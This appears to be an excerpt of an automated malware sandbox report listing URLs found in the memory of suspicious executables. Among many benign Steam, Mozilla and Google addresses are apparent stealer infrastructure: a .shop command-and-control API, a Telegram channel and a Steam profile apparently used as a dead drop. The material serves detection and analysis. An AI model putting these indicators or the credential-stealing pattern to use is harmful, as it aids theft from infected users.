Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=X93cgZRtuH6z&amp;l=engli
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=GfA42_x2_aub&amp;
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&amp;
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=1rP88j3WZLBx&amp
Source: katA304.tmp, 0000000D.00000003.2699380936.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=engl
Source: 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=
Source: katA304.tmp, 0000000D.00000003.2699380936.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009E5000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2714941039.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2745951442.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/heade
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=wJD9maDpDcV
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js
Source: katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0&amp
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, BGHJJD.13.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, BGHJJD.13.dr String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://help.steampowered.com/en/
Source: BGHJJD.13.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: katA304.tmp, 0000000D.00000003.2954598734.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: https://mozilla.org0/
Source: explorer.exe, 00000002.00000000.2040029267.0000000009B98000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: explorer.exe, 00000002.00000000.2042302155.000000000C460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: 76561199689717899[1].htm.13.dr String found in binary or memory: https://steamcommunity.com/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://steamcommunity.com/discussions/
Source: katA304.tmp, 0000000D.00000003.2730520789.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/login/ho
Source: 76561199689717899[1].htm.13.dr String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199689717899
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/m
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://steamcommunity.com/market/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: C9A7.exe, 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, C9A7.exe, 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, C9A7.exe, 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000978000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.0000000000422000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/badges
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899/inventory/
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899Y
Source: katA304.tmp, 0000000D.00000002.3122811283.0000000000422000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199689717899r0isMozilla/5.0
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199689717899[1].htm.13.dr String found in binary or memory: https://store.steampowered.com/
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: 76561199689717899[1].htm.13.dr String found in binary or memory: https://store.steampowered.com/about/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://store.steampowered.com/explore/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2730520789.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://store.steampowered.com/legal/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://store.steampowered.com/mobile
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://store.steampowered.com/news/
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://store.steampowered.com/points/shop/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://store.steampowered.com/stats/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: katA304.tmp, 0000000D.00000002.3122811283.000000000043C000.00000040.00000400.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2654301050.00000000009A4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2682812689.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, 76561199689717899[1].htm.13.dr String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: GIIDBG.13.dr String found in binary or memory: https://support.mozilla.org
Source: GIIDBG.13.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 21AE.exe, 00000005.00000003.2385657700.0000000002D94000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: GIIDBG.13.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: C9A7.exe, 0000000C.00000002.2641621333.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, C9A7.exe, 0000000C.00000002.2640862661.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, C9A7.exe, 0000000C.00000002.2639865641.0000000002590000.00000040.00001000.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3122811283.0000000000422000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/copterwin
Source: katA304.tmp, 0000000D.00000002.3122811283.0000000000422000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/copterwinr0isMozilla/5.0
Source: 21AE.exe, 00000005.00000003.2357257185.000000000081F000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000002.2691748524.000000000089C000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2357257185.0000000000801000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506059857.000000000089B000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2493723508.000000000088F000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2397590103.0000000002C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/
Source: 21AE.exe, 00000005.00000003.2357257185.0000000000846000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/Jf
Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506115149.0000000000846000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/X
Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2357257185.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2505921541.0000000002C83000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2357257185.000000000087D000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000002.2692634099.0000000002C83000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506115149.0000000000846000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/api
Source: 21AE.exe, 00000005.00000003.2505921541.0000000002C83000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000002.2692634099.0000000002C83000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/apie
Source: 21AE.exe, 00000005.00000002.2691748524.0000000000846000.00000004.00000020.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2506115149.0000000000846000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop/ri
Source: 21AE.exe, 00000005.00000003.2383608001.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2383291986.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2505921541.0000000002C83000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2398025709.0000000002C7F000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2383365847.0000000002C7D000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000002.2692634099.0000000002C83000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://whispedwoodmoodsksl.shop:443/api
Source: explorer.exe, 00000002.00000000.2040029267.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000002.00000000.2040029267.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comon
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, BGHJJD.13.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: katA304.tmp, 0000000D.00000002.3125392670.00000000009F4000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000A34000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000002.3125392670.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, BGHJJD.13.dr String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: katA304.tmp, 0000000D.00000003.2954487712.0000000000A36000.00000004.00000020.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2858305689.0000000000A4E000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.13.dr, mozglue.dll.13.dr, softokn3[1].dll.13.dr, freebl3.dll.13.dr, mozglue[1].dll.13.dr, softokn3.dll.13.dr, freebl3[1].dll.13.dr, nss3.dll.13.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: 21AE.exe, 00000005.00000003.2359708104.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359456032.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, 21AE.exe, 00000005.00000003.2359292886.0000000002CAA000.00000004.00000800.00020000.00000000.sdmp, katA304.tmp, 0000000D.00000003.2814628102.0000000000A70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: katA304.tmp, 0000000D.00000003.2654301050.00000000009B1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: GIIDBG.13.dr String found in binary or memory: https://www.mozilla.org
Source: GIIDBG.13.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
